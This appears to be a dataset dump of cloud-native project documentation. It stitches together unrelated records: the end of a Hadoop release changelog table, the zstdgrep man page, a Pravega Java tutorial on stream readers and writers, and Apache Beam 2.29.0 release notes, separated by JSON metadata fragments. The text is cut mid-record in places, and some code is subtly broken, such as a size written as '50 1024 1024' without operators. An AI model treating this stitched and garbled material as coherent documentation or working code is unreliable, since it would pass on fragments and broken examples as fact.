Improve datanode shutdown latency | Major | datanode | Ahmed Hussein | Ahmed Hussein | | | Delete hadoop.ssl.enabled and dfs.https.enable from docs and core-default.xml | Major | documentation | Takanobu Asanuma | Takanobu Asanuma | | | Namenode deletes large dir slowly caused by FoldedTreeSet#removeAndGet | Major | . | Yiqun Lin | Haibin Huang | | | DFTestUtil.waitReplication can produce false positives | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | LeaseRenewer#daemon threads leak in DFSClient | Major | . | Tao Yang | Renukaprasad C | | | [UI2] Upgrade Node.js to at least v12.22.1 | Major | yarn-ui-v2 | Akira Ajisaka | Masatake Iwasaki | | | Backport YARN-9789 to branch-3.2 | Major | . | Tarun Parimi | Tarun Parimi | | | Upgrade JUnit to 4.13.2 | Major | . | Ahmed Hussein | Ahmed Hussein | | | Title not set for JHS and NM webpages | Major | . | Rajshree Mishra | Bilwa S T | | | Avoid creating LayoutFlags redundant objects | Major | . | Viraj Jasani | Viraj Jasani | | | Incorrect log placeholders used in JournalNodeSyncer | Minor | . | Viraj Jasani | Viraj Jasani | | | Mapreduce job fails when NM is stopped | Major | . | Bilwa S T | Bilwa S T | | | Iterative snapshot diff report can generate duplicate records for creates, deletes and Renames | Major | snapshots | Srinivasu Majeti | Shashikant Banerjee | | | ConcurrentModificationException error happens on NameNode occasionally | Critical | hdfs | Daniel Ma | Daniel Ma | | | Better token validation | Major | . | Artem Smotrakov | Artem Smotrakov | | | DatanodeAdminMonitor scan should be delay based | Major | datanode | Ahmed Hussein | Ahmed Hussein | | | Improper pipeline close recovery causes a permanent write failure or data loss. | Major | . | Kihwal Lee | Kihwal Lee | | | ViewFS should initialize target filesystems lazily | Major | client-mounts, fs, viewfs | Uma Maheswara Rao G | Abhishek Das | | | HDFS default value change (with adding time unit) breaks old version MR tarball work with Hadoop 3.x | Critical | configuration, hdfs | Junping Du | Akira Ajisaka | | | Set default capacity of root for node labels | Major | . | Andras Gyori | Andras Gyori | | | TestTimelineClientV2Impl.testSyncCall fails intermittently | Minor | ATSv2, test | Prabhu Joseph | Andras Gyori | | | Multiple CloseOp shared block instance causes the standby namenode to crash when rolling editlog | Critical | . | Yicong Cai | Wan Chang | | | RM HA startup can fail due to race conditions in ZKConfigurationStore | Major | . | Tarun Parimi | Tarun Parimi | | | Entities missing from ATS when summary log file info got returned to the ATS before the domain log | Critical | yarn | Sushmitha Sreenivasan | Xiaomin Zhang | | | HistoryServerRest.html#Task\\Counters\\API, modify the jobTaskCounters's itemName from \"taskcounterGroup\" to" }, { "data": "| Minor | documentation | jenny | jenny | | | Fix fair scheduler race condition in app submit and queue cleanup | Blocker | fairscheduler | Wilfred Spiegelenburg | Wilfred Spiegelenburg | | | Fair scheduler can delete a dynamic queue while an application attempt is being added to the queue | Major | fairscheduler | Haibo Chen | Wilfred Spiegelenburg | | | Upgrade commons-compress to 1.21 | Major | common | Dongjoon Hyun | Akira Ajisaka | | | Upgrade JSON smart to 2.4.7 | Major | . | Renukaprasad C | Renukaprasad C | | | Upgrade ZooKeeper to 3.4.14 in branch-3.2 | Major | . | Akira Ajisaka | Masatake Iwasaki | | | Bug fix for Util#receiveFile | Minor | . | tomscut | tomscut | | | YARN shouldn't start with empty hadoop.http.authentication.signature.secret.file | Major | . | Benjamin Teke | Tamas Domok | | | Avoid possible class loading deadlock with VerifierNone initialization | Major | . | Viraj Jasani | Viraj Jasani | | | Upgrade ant to 1.10.11 | Major | . | Ahmed Hussein | Ahmed Hussein | | | Permission checking error on an existing directory in LogAggregationFileController#verifyAndCreateRemoteLogDir | Major | nodemanager | Tamas Domok | Tamas Domok | | | SnapshotDiff behaviour with Xattrs and Acls is not consistent across NN restarts with checkpointing | Major | snapshots | Srinivasu Majeti | Shashikant Banerjee | | | Short circuit read leaks Slot objects when InvalidToken exception is thrown | Major | . | Eungsop Yoo | Eungsop Yoo | | | Backport HADOOP-15993 to branch-3.2 which address CVE-2014-4611 | Major | . | Brahma Reddy Battula | Brahma Reddy Battula | | | Do not use exception handler to implement copy-on-write for EnumCounters | Major | namenode | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Deadlock in LeaseRenewer for static remove method | Major | hdfs | angerszhu | angerszhu | | | Upgrade Kafka to 2.8.1 | Major | . | Takanobu Asanuma | Takanobu Asanuma | | | Int overflow in computing safe length during EC block recovery | Critical | 3.1.1 | daimin | daimin | | | Exclude IBM Java security classes from being shaded/relocated | Major | build | Nicholas Marion | Nicholas Marion | | | Backport HADOOP-17683 for branch-3.2 | Major | security | Ananya Singh | Ananya Singh | | | Disable JIRA plugin for YETUS on Hadoop | Critical | build | Gautham Banasandra | Gautham Banasandra | | | numOfReplicas is given the wrong value in BlockPlacementPolicyDefault$chooseTarget can cause DataStreamer to fail with Heterogeneous Storage | Major | namanode | Max Xie | Max Xie | | | Datanode start time should be set after RPC server starts successfully | Minor | . | Viraj Jasani | Viraj Jasani | | | Synchronizing iteration of Configuration properties object | Major | conf | Jason Darrell Lowe | Dhananjay Badaya | | | Backport HDFS-14729 for branch-3.2 | Major | security | Ananya Singh | Ananya Singh | | | Unknown frame descriptor when decompressing multiple frames in ZStandardDecompressor | Major | . | xuzq | xuzq | | | Insecure Xml parsing in OfflineEditsXmlLoader | Minor |" }, { "data": "| Ashutosh Gupta | Ashutosh Gupta | | | Avoid deleting unique data blocks when deleting redundancy striped blocks | Critical | ec, erasure-coding | qinyuren | Jackson Wang | | | Source path with storagePolicy cause wrong typeConsumed while rename | Major | hdfs, namenode | lei w | lei w | | | ReverseXML processor doesn't accept XML files without the SnapshotDiffSection. | Critical | hdfs | yanbin.zhang | yanbin.zhang | | | Fix thread safety of EC decoding during concurrent preads | Critical | dfsclient, ec, erasure-coding | daimin | daimin | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Timeline related testcases are failing | Major | . | Prabhu Joseph | Abhishek Modi | | | TestRedudantBlocks#testProcessOverReplicatedAndRedudantBlock sometimes fails | Minor | test | Hui Fei | Hui Fei | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | [JDK9] Add missing javax.activation-api dependency | Critical | test | Akira Ajisaka | Akira Ajisaka | | | FSSchedulerConfigurationStore fails to update with hdfs path | Major | capacityscheduler | Prabhu Joseph | Prabhu Joseph | | | Rewrite Python example codes using Python3 | Minor | documentation | Kengo Seki | Kengo Seki | | | Update jackson-databind to 2.10.3 to relieve us from the endless CVE patches | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | TestRMHATimelineCollectors fails on hadoop trunk | Major | test, yarn | Ahmed Hussein | Bilwa S T | | | ViewFsOverloadScheme should work when -fs option pointing to remote cluster without mount links | Major | viewfsOverloadScheme | Uma Maheswara Rao G | Uma Maheswara Rao G | | | When Empty mount points, we are assigning fallback link to self. But it should not use full URI for target fs. | Major | . | Uma Maheswara Rao G | Uma Maheswara Rao G | | | TestBlockTokenWithDFSStriped fails intermittently | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | TestDFSClientRetries#testGetFileChecksum fails intermittently | Major | dfsclient, test | Ahmed Hussein | Ahmed Hussein | | | TestHAAppend#testMultipleAppendsDuringCatchupTailing is flaky | Major | . | Vinayakumar B | Ahmed Hussein | | | TestFsDatasetImpl fails intermittently | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | Backport HADOOP-16005-\"NativeAzureFileSystem does not support setXAttr\" to branch-3.2 | Major | fs/azure | Sally Zuo | Sally Zuo | | | EC: Fix checksum computation in case of native encoders | Blocker | . | Ahmed Hussein | Ayush Saxena | | | WASB: Test failures | Major | fs/azure, test | Sneha Vijayarajan | Steve Loughran | | | TestUpgradeDomainBlockPlacementPolicy flaky | Major | namenode, test | Ahmed Hussein | Ahmed Hussein | | | TestMultipleNNPortQOP#testMultipleNNPortOverwriteDownStream fails intermittently | Minor | . | Toshihiko Uchida | Toshihiko Uchida | | | TestBalancerWithMultipleNameNodes#testBalancingBlockpoolsWithBlockPoolPolicy fails on trunk | Major | . | Ahmed Hussein | Masatake Iwasaki | | | Fix TestFsDatasetImpl.testReadLockCanBeDisabledByConfig | Minor | test | Leon Gao | Leon Gao | | | Migrate to Python 3 and upgrade Yetus to 0.13.0 | Major | . | Akira Ajisaka | Akira Ajisaka | | | Improve the Logs for File Concat Operation | Minor | namenode | Bhavik Patel | Bhavik Patel | | | TestBalancer#testMaxIterationTime fails sporadically | Major | . | Jason Darrell Lowe | Toshihiko Uchida | | | ClusterMetrics should support GPU capacity related" }, { "data": "| Major | metrics, resourcemanager | Qi Zhu | Qi Zhu | | | Improve the log for HTTPFS server operation | Minor | httpfs | Bhavik Patel | Bhavik Patel | | | Some tests in TestBlockRecovery are consistently failing | Major | . | Viraj Jasani | Viraj Jasani | | | Add cluster metric for amount of CPU used by RM Event Processor | Minor | yarn | Jim Brennan | Jim Brennan | | | [JDK 15] TestPrintableString fails due to Unicode 13.0 support | Major | . | Akira Ajisaka | Akira Ajisaka | | | Change CS nodes page in UI to support custom resource. | Major | . | Qi Zhu | Qi Zhu | | | whitespace not allowed in paths when saving files to s3a via committer | Blocker | fs/s3 | Krzysztof Adamski | Krzysztof Adamski | | | mvn versions:set fails to parse pom.xml | Blocker | build | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Race condition: AsyncDispatcher can get stuck by the changes introduced in YARN-8995 | Critical | resourcemanager | zhengchenyu | zhengchenyu | | | Set dfs.namenode.redundancy.considerLoad to false in MiniDFSCluster | Major | test | Akira Ajisaka | Ahmed Hussein | | | Backport HADOOP-17837 to branch-3.2 | Minor | . | Bryan Beaudreault | Bryan Beaudreault | | | implement non-guava Precondition checkNotNull | Major | . | Ahmed Hussein | Ahmed Hussein | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Remove unused configuration dfs.namenode.stripe.min | Minor | . | tomscut | tomscut | | | Add metrics for FSNamesystem read/write lock hold long time | Major | hdfs | tomscut | tomscut | | | Add namenode address in logs for block report | Minor | datanode, hdfs | tomscut | tomscut | | | Close FSImage and FSNamesystem after formatting is complete | Minor | . | tomscut | tomscut | | | Add metric for editPendingQ in FSEditLogAsync | Minor | . | tomscut | tomscut | | | Remove unused parameters for DatanodeManager.handleLifeline() | Minor | . | tomscut | tomscut | | | CapacityScheduler test framework ProportionalCapacityPreemptionPolicyMockFramework need some review | Major | . | Gergely Pollk | Szilard Nemeth | | | Reduce threadCount for unit tests to reduce the memory usage | Major | build, test | Akira Ajisaka | Akira Ajisaka | | | Upgrade com.fasterxml.woodstox:woodstox-core for security reasons | Major | . | Viraj Jasani | Viraj Jasani | | | DFSAdmin#printOpenFiles has redundant String#format usage | Minor | . | Viraj Jasani | Viraj Jasani | | | Bump netty to the latest 4.1.61 | Blocker | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Backport to branch-3.2 HADOOP-17371, HADOOP-17621, HADOOP-17625 to update Jetty to 9.4.39 | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Split TestBalancer into two classes | Major | . | Viraj Jasani | Viraj Jasani | | | ipc.Client not setting interrupt flag after catching InterruptedException | Minor | . | Viraj Jasani | Viraj Jasani | | | Bump aliyun-sdk-oss to 3.13.0 | Major | . | Siyao Meng | Siyao Meng | | | Bump netty to the latest 4.1.68 | Major | . | Takanobu Asanuma | Takanobu Asanuma | | | Update the year to 2022 | Major | . | Ayush Saxena | Ayush Saxena | | | Utility to identify git commit / Jira fixVersion discrepancies for RC preparation" } ]
{ "category": "App Definition and Development", "file_name": "zstdgrep.1.md", "project_name": "MongoDB", "subcategory": "Database" }
[ { "data": "zstdgrep(1) -- print lines matching a pattern in zstandard-compressed files ============================================================================ SYNOPSIS -- `zstdgrep` [<grep-flags>] [--] <pattern> [<files> ...] DESCRIPTION -- `zstdgrep` runs `grep`(1) on files, or `stdin` if no files argument is given, after decompressing them with `zstdcat`(1). The <grep-flags> and <pattern> arguments are passed on to `grep`(1). If an `-e` flag is found in the <grep-flags>, `zstdgrep` will not look for a <pattern> argument. Note that modern `grep` alternatives such as `ripgrep` (`rg`(1)) support `zstd`-compressed files out of the box, and can prove better alternatives than `zstdgrep` notably for unsupported complex pattern searches. Note though that such alternatives may also feature some minor command line differences. EXIT STATUS -- In case of missing arguments or missing pattern, 1 will be returned, otherwise 0. SEE ALSO -- `zstd`(1) AUTHORS Thomas Klausner <wiz@NetBSD.org>" } ]
{ "category": "App Definition and Development", "file_name": "basic-reader-and-writer.md", "project_name": "Pravega", "subcategory": "Streaming & Messaging" }
[ { "data": "<!-- Copyright Pravega Authors. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> Let's examine how to build Pravega applications. The simplest kind of Pravega application uses a Reader to read from a Stream or a Writer that writes to a Stream.A simple sample application of both can be found in the (`HelloWorldReader` and `HelloWorldWriter`) applications. These samples give a sense on how a Java application could use the Pravega's Java Client Library to access Pravega functionality. Instructions for running the sample applications can be found in the [Pravega Samples](https://github.com/pravega/pravega-samples/blob/v0.5.0/pravega-client-examples/README.md). Get familiar with the before executing the sample applications. The `HelloWorldWriter` application demonstrates the usage of `EventStreamWriter` to write an Event to Pravega. The key part of `HelloWorldWriter` is in the `run()` method. The purpose of the `run()` method is to create a Stream and output the given Event to that Stream. ```Java public void run(String routingKey, String message) { StreamManager streamManager = StreamManager.create(controllerURI); final boolean scopeCreation = streamManager.createScope(scope); StreamConfiguration streamConfig = StreamConfiguration.builder() .scalingPolicy(ScalingPolicy.fixed(1)) .build(); final boolean streamCreation = streamManager.createStream(scope, streamName, streamConfig); try (ClientFactory clientFactory = ClientFactory.withScope(scope, controllerURI); EventStreamWriter<String> writer = clientFactory.createEventWriter(streamName, new JavaSerializer<String>(), EventWriterConfig.builder().build())) { System.out.format(\"Writing message: '%s' with routing-key: '%s' to stream '%s / %s'%n\", message, routingKey, scope, streamName); final CompletableFuture<Void> writeFuture = writer.writeEvent(routingKey, message); } } ``` are created and manipulated via the `StreamManager` interface to the Pravega Controller. An URI to any of the Pravega Controller instance(s) in your cluster is required to create a `StreamManager` object. In the setup for the `HelloWorld` sample applications, the `controllerURI` is configured as a command line parameter when the sample application is launched. Note: For the \"standalone\" deployment of Pravega, the Controller is listening on localhost, port 9090. The `StreamManager` provides access to various control plane functions in Pravega related to Scopes and Streams: | Method | Parameters | Discussion | |--|-|-| | (static) `create` | (`URI controller`) | Given a URI to one of the Pravega Controller instances in the Pravega Cluster, create a Stream Manager object. | | `createScope` | (String `scopeName`) | Creates a Scope with the given name. | | | | Returns True if the Scope is created, returns False if the Scope already exists. | | | | This method can be called even if the Stream is already existing. | | `deleteScope` | (String `scopeName`) | Deletes a Scope with the given name. | | | | Returns True if the scope was deleted, returns False otherwise. | | | | If the Scope contains Streams, the `deleteScope` operation will fail with an exception. | | | | If we delete a non-existent Scope, the method will succeed and return False. | | `createStream` | (String `scopeName`, String `streamName`, `StreamConfiguration config`) | Create a Stream within a given Scope. | | | | Both Scope name and Stream name are limited using the following characters: Letters (a-z A-Z), numbers (0-9) and delimiters: \".\" and \"-\" are" }, { "data": "| | | | The Scope must exist, an exception is thrown if we create a Stream in a non-existent Scope. | | | | A Stream Configuration is built using a builder pattern. | | | | Returns True if the Stream is created, returns False if the Stream already exists. | | | | This method can be called even if the Stream is already existing. | | `updateStream` | (String `scopeName`, String `streamName`, `StreamConfiguration config`) | Swap out the Stream's configuration. | | | | The Stream must already exist, an exception is thrown if we update a non-existent Stream. | | | | Returns True if the Stream was changed. | | `sealStream` | (String `scopeName`, String `streamName`) | Prevent any further writes to a Stream. | | | | The Stream must already exist, an exception is thrown if you seal a non-existent Stream. | | | | Returns True if the Stream is successfully sealed. | | `deleteStream` | (String `scopeName`, String `streamName`) | Remove the Stream from Pravega and recover any resources used by that Stream. | | | | Returns False if the Stream is non-existent. | | | | Returns True if the Stream was deleted. | The execution of API `createScope(scope)` establishes that the Scope exists. Then we can create the Stream using the API `createStream(scope, streamName, streamConfig)`. The `StreamManager` requires three parameters to create a Stream: Scope Name. Stream Name. Stream Configuration. The most interesting task is to create the Stream Configuration (`streamConfig`). Like many objects in Pravega, a Stream takes a configuration object that allows a developer to control various behaviors of the Stream. All configuration object instantiated via builder pattern. That allows a developer to control various aspects of a Stream's behavior in terms of policies; and [Scaling Policy](pravega-concepts.md#elastic-streams-auto-scaling) are the most important ones related to Streams. For the sake of simplicity, in our sample application we instantiate a Stream with a single segment (`ScalingPolicy.fixed(1)`) and using the default (infinite) retention policy. Once the Stream Configuration (`streamConfig`) object is built, creating the Stream is straight forward using `createStream()`.After the Stream is created, we are all set to start writing Event(s) to the Stream. Applications use an `EventStreamWriter` object to write Events to a Stream.The `EventStreamWriter` is created using the `ClientFactory` object. The `ClientFactory` is used to create Readers, Writers and other types of Pravega Client objects such as the State Synchronizer (see[Working with Pravega: State Synchronizer](state-synchronizer.md)). A `ClientFactory` is created in the context of a Scope, since all Readers, Writers and other Clients created by the `ClientFactory` are created in the context of that Scope.The `ClientFactory` also needs a URI to one of the Pravega Controllers (`ClientFactory.withScope(scope, controllerURI)`) , just like `StreamManager`. As the `ClientFactory` and the objects it creates consume resources from Pravega and implement `AutoCloseable`, it is a good practice to create these objects using a try-with-resources. By doing this, we make sure that, regardless of how the application ends, the Pravega resources will be properly closed in the right order. Once the `ClientFactory` is instantiated, we can use it to create a Writer. There are several things a developer needs to know before creating a Writer: What is the name of the Stream to write to? (The Scope has already been determined when the `ClientFactory` was" }, { "data": "What Type of Event objects will be written to the Stream? What serializer will be used to convert an Event object to bytes? (Recall that Pravega only knows about sequences of bytes, it is unaware about Java objects.) Does the Writer need to be configured with any special behavior? ```Java EventStreamWriter<String> writer = clientFactory.createEventWriter(streamName, new JavaSerializer<String>(), EventWriterConfig.builder().build())) ``` The `EventStreamWriter` writes to the Stream specified in the configuration of the `HelloWorldWriter` sample application (by default the stream is named \"helloStream\" in the \"examples\" Scope). The Writer processes Java String objects as Events and uses the built in Java serializer for Strings. Note: Pravega allows users to write their own serializer. For more information and example, please refer to . The `EventWriterConfig` allows the developer to specify things like the number of attempts to retry a request before giving up and associated exponential back-off settings. Pravega takes care to retry requests in the presence of connection failures or Pravega component outages, which may temporarily prevent a request from succeeding, so application logic doesn't need to be complicated by dealing with intermittent cluster failures.In the sample application, `EventWriterConfig` was considered as the default settings. `EventStreamWriter` provides a `writeEvent()` operation that writes the given non-null Event object to the Stream using a given Routing key to determine which Stream Segment it should written to. Many operations in Pravega, such as `writeEvent()`, are asynchronous and return some sort of `Future` object. If the application needed to make sure the Event was durably written to Pravega and available for Readers, it could wait on the `Future` before proceeding. In the case of Pravega's `HelloWorld` example, it does wait on the `Future`. `EventStreamWriter` can also be used to begin a Transaction. We cover Transactions in more detail in [Working with Pravega: Transactions](transactions.md). The `HelloWorldReader` is a simple demonstration of using the `EventStreamReader`. The application reads Events from the given Stream and prints a string representation of those Events onto the console. Just like the `HelloWorldWriter` example, the key part of the `HelloWorldReader` application is in the `run()` method: ```Java public void run() { StreamManager streamManager = StreamManager.create(controllerURI); final boolean scopeIsNew = streamManager.createScope(scope); StreamConfiguration streamConfig = StreamConfiguration.builder() .scalingPolicy(ScalingPolicy.fixed(1)) .build(); final boolean streamIsNew = streamManager.createStream(scope, streamName, streamConfig); final String readerGroup = UUID.randomUUID().toString().replace(\"-\", \"\"); final ReaderGroupConfig readerGroupConfig = ReaderGroupConfig.builder() .stream(Stream.of(scope, streamName)) .build(); try (ReaderGroupManager readerGroupManager = ReaderGroupManager.withScope(scope, controllerURI)) { readerGroupManager.createReaderGroup(readerGroup, readerGroupConfig); } try (ClientFactory clientFactory = ClientFactory.withScope(scope, controllerURI); EventStreamReader<String> reader = clientFactory.createReader(\"reader\", readerGroup, new JavaSerializer<String>(), ReaderConfig.builder().build())) { System.out.format(\"Reading all the events from %s/%s%n\", scope, streamName); EventRead<String> event = null; do { try { event = reader.readNextEvent(READERTIMEOUTMS); if (event.getEvent() != null) { System.out.format(\"Read event '%s'%n\", event.getEvent()); } } catch (ReinitializationRequiredException e) { //There are certain circumstances where the reader needs to be reinitialized e.printStackTrace(); } } while (event.getEvent() != null); System.out.format(\"No more events from %s/%s%n\", scope, streamName); } } ``` The API `streamManager.createScope()` and `streamManager.createStream()` set up the Scope and Stream just like in the `HelloWorldWriter` application.The API `ReaderGroupConfig` set up the Reader Group as the prerequisite to creating the `EventStreamReader` and using it to read Events from the Stream (`createReader()`,`reader.readNextEvent()`). Any Reader in Pravega belongs to some `ReaderGroup`. A `ReaderGroup` is a grouping of one or more Readers that consume from a Stream in parallel. Before we create a Reader, we need to either create a `ReaderGroup` (or be aware of the name of an existing `ReaderGroup`). This application only uses the basics from Reader" }, { "data": "`ReaderGroup` objects are created from a `ReaderGroupManager` object. The `ReaderGroupManager` object, in turn, is created on a given Scope with a URI to one of the Pravega Controllers, very much like a `ClientFactory` is created. Note that, the `createReaderGroup` is also in a try-with-resources statement to make sure that the `ReaderGroupManager` is properly cleaned up. The `ReaderGroupManager` allows a developer to create, delete and retrieve `ReaderGroup` objects using the name. To create a `ReaderGroup`, the developer needs a name for the Reader Group and a configuration with a set of one or more Streams to read from. The Reader Group's name (alphanumeric) might be meaningful to the application, like \"WebClickStreamReaders\". In cases where we require multiple Readers reading in parallel and each Reader in a separate process, it is helpful to have a human readable name for the Reader Group.In this example, we have one Reader, reading in isolation, so a UUID is a safe way to name the Reader Group. The Reader Group is created via the `ReaderGroupManager` and since the `ReaderGroupManager` is created within the context of a Scope, we can safely conclude that Reader Group names are namespaced by that Scope. The developer specifies the Stream which should be the part of the Reader Group and its lower and upper bounds. In the sample application, we start at the beginning of the Stream as follows: ```Java final ReaderGroupConfig readerGroupConfig = ReaderGroupConfig.builder() .stream(Stream.of(scope, streamName)) .build(); ``` Other configuration items, such as Checkpointing are options that will be available through the `ReaderGroupConfig`. The Reader Group can be configured to read from multiple Streams.For example, imagine a situation where there is a collection of Stream of sensor data coming from a factory floor, each machine has its own Stream of sensor data. We can build applications that uses a Reader Group per Stream so that the application reasons about data from exactly one machine.We can build other applications that use a Reader Group configured to read from all of the Streams. To keep it simple, in the sample application the Reader Group only reads from one Stream. We can call `createReaderGroup` with the same parameters multiple times and the same Reader Group will be returned each time after it is initially created (idempotent operation). Note that in other cases, if the developer knows the name of the Reader Group to use and knows it has already been created, they can use `getReaderGroup()` on `ReaderGroupManager` to retrieve the `ReaderGroup` object by name. At this point, we have the Scope and Stream is set up and the `ReaderGroup` object created. Next, we need to create a Reader and start reading Events. First, we create a `ClientFactory` object, the same way we did it in the `HelloWorldWriter` application.Then we use the `ClientFactory` to create an `EventStreamReader` object. The following are the four parameters to create a Reader: Name for the Reader. Reader Group it should be part of. The type of object expected on the Stream. Serializer to convert from the bytes stored in Pravega into the Event objects and a `ReaderConfig`. ```Java EventStreamReader<String> reader = clientFactory.createReader(\"reader\", readerGroup, new JavaSerializer<String>(), ReaderConfig.builder().build())) ``` The name of the Reader can be any valid Pravega naming convention (numbers and letters). Note that the name of the Reader is namespaced within the" }, { "data": "`EventStreamWriter` and `EventStreamReader` uses Java generic types to allow a developer to specify a type safe Reader. In the sample application, we read Strings from the stream and use the standard Java String Serializer to convert the bytes read from the stream into String objects. Note: Pravega allows users to write their own serializer. For more information and example, please refer to . Finally, we use a `ReaderConfig` object with default values. Note that you cannot create the same Reader multiple times. That is, an application may call `createReader()` to add new Readers to the Reader Group. But if the Reader Group already contains a Reader with that name, an exception is thrown. After creating an `EventStreamReader`, we can use it to read Events from the Stream. The `readNextEvent()` operation returns the next Event available on the Stream, or if there is no such Event, blocks for a specified time. After the expiry of the timeout period, if no Event is available for reading, then Null is returned. The null check (`EventRead<String> event = null`) is used to avoid printing out a spurious Null event message to the console and also used to terminate the loop.Note that the Event itself is wrapped in an `EventRead` object. It is worth noting that `readNextEvent()` may throw an exception `ReinitializationRequiredException` and the object is reinitialized. This exception would be handled in cases where the Readers in the Reader Group need to reset to a Checkpoint or the Reader Group itself has been altered and the set of Streams being read has been therefore changed. `TruncatedDataException` is thrown when we try to read the deleted data. It is however possible to recover from the later by calling `readNextEvent()` again (it will just skip forward). Thus, the simple `HelloWorldReader` loops, reading Events from a Stream until there are no more Events, and then the application terminates. `BatchClient` is used for applications that require parallel, unordered reads of historical stream data. Using the Batch Reader all the segments in a Stream can be listed and read from. Hence, the Events for a given Routing Key which can reside on multiple segments are not read in order. Obviously this API is not for every application, the main advantage is that it allows for low level integration with batch processing frameworks such as `MapReduce`. To iterate over all the segments in the stream: ```Java //Passing null to fromStreamCut and toStreamCut will result in using the current start of stream and the current end of stream respectively. Iterator<SegmentRange> segments = client.listSegments(stream, null, null).getIterator(); SegmentRange segmentInfo = segments.next(); ``` To read the events from a segment: ```Java SegmentIterator<T> events = client.readSegment(segmentInfo, deserializer); while (events.hasNext()) { processEvent(events.next()); } ``` For a streaming application like Spark, which uses micro-batch reader connectors, needs a streamCut to read Pravega Streams in batches. ```Java StreamCut startingStreamCut = streamManager.fetchStreamInfo(streamScope, streamName).join().getHeadStreamCut(); long approxDistanceToNextOffset = 50 1024 1024; // 50MB in bytes StreamCut nextStreamCut = client.getNextStreamCut(startingStreamCut, approxDistanceToNextOffset); ``` This api provides a streamCut that is a bounded distance from another streamcut. It takes a starting streamCut and an approximate distance in bytes as parameters and return a new stream cut. No segments from the starting streamCut is skipped over. The position for each segment in the new StreamCut is either present inside the segment or at the tail of it. The successors for the respective segments are called only if its position in the startingStreamCut is at the tail." } ]
{ "category": "App Definition and Development", "file_name": "beam-2.29.0.md", "project_name": "Beam", "subcategory": "Streaming & Messaging" }
[ { "data": "title: \"Apache Beam 2.29.0\" date: 2021-04-29 9:00:00 -0700 categories: blog release authors: klk <!-- Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> We are happy to present the new 2.29.0 release of Beam. This release includes both improvements and new functionality. See the for this release. <!--more--> For more information on changes in 2.29.0, check out the . Spark Classic and Portable runners officially support Spark 3 (). Official Java 11 support for most runners (Dataflow, Flink, Spark) (). DataFrame API now supports GroupBy.apply (). Added support for S3 filesystem on AWS SDK V2 (Java) () GCP BigQuery sink (file loads) uses runner determined sharding for unbounded data () KafkaIO now recognizes the `partition` property in writing records () Support for Hadoop configuration on ParquetIO () DataFrame API now supports pandas 1.2.x (). Multiple DataFrame API bugfixes (, ) DDL supported in SQL transforms () Upgrade Flink runner to Flink version 1.12.2 () Deterministic coding enforced for GroupByKey and Stateful DoFns. Previously non-deterministic coding was allowed, resulting in keys not properly being grouped in some cases. () To restore the old behavior, one can register `FakeDeterministicFastPrimitivesCoder` with `beam.coders.registry.registerfallbackcoder(beam.coders.coders.FakeDeterministicFastPrimitivesCoder())` or use the `allownondeterministickeycoders` pipeline option. Support for Flink 1.8 and 1.9 will be removed in the next release (2.30.0) (). See a full list of open this version. According to `git shortlog`, the following people contributed to the 2.29.0 release. Thank you to all contributors! Ahmet Altay, Alan Myrvold, Alex Amato, Alexander Chermenin, Alexey Romanenko, Allen Pradeep Xavier, Amy Wu, Anant Damle, Andreas Bergmeier, Andrei Balici, Andrew Pilloud, Andy Xu, Ankur Goenka, Bashir Sadjad, Benjamin Gonzalez, Boyuan Zhang, Brian Hulette, Chamikara Jayalath, Chinmoy Mandayam, Chuck Yang, dandy10, Daniel Collins, Daniel Oliveira, David Cavazos, David Huntsperger, David Moravek, Dmytro Kozhevin, Emily Ye, Esun Kim, Evgeniy Belousov, Filip Popi, Fokko Driesprong, Gris Cuevas, Heejong Lee, Ihor Indyk, Ismal Meja, Jakub-Sadowski, Jan Lukavsk, John Edmonds, Juan Sandoval, , Kenneth Jung, Kenneth Knowles, KevinGG, Kiley Sok, Kyle Weaver, MabelYC, Mackenzie Clark, Masato Nakamura, Milena Bukal, Miltos, Minbo Bae, Mira Vuslat Baaran, mynameborat, Nahian-Al Hasan, Nam Bui, Niel Markwick, Niels Basjes, Ning Kang, Nir Gazit, Pablo Estrada, Ramazan Yapparov, Raphael Sanamyan, Reuven Lax, Rion Williams, Robert Bradshaw, Robert Burke, Rui Wang, Sam Rohde, Sam Whittle, Shehzaad Nakhoda, Shehzaad Nakhoda, Siyuan Chen, Sonam Ramchand, Steve Niemitz, sychen, Sylvain Veyri, Tim Robertson, Tobias Kaymak, Tomasz Szerszen, Tomasz Szersze, Tomo Suzuki, Tyson Hamilton, Udi Meiri, Valentyn Tymofieiev, Yichi Zhang, Yifan Mai, Yixing Zhang, Yoshiki Obata" } ]
{ "category": "App Definition and Development", "file_name": "2022_10_14_ShardingSphere_5.2.0_Audit_for_sharding_intercepts_unreasonable_requests_in_multi-shards_scenarios.en.md", "project_name": "ShardingSphere", "subcategory": "Database" }
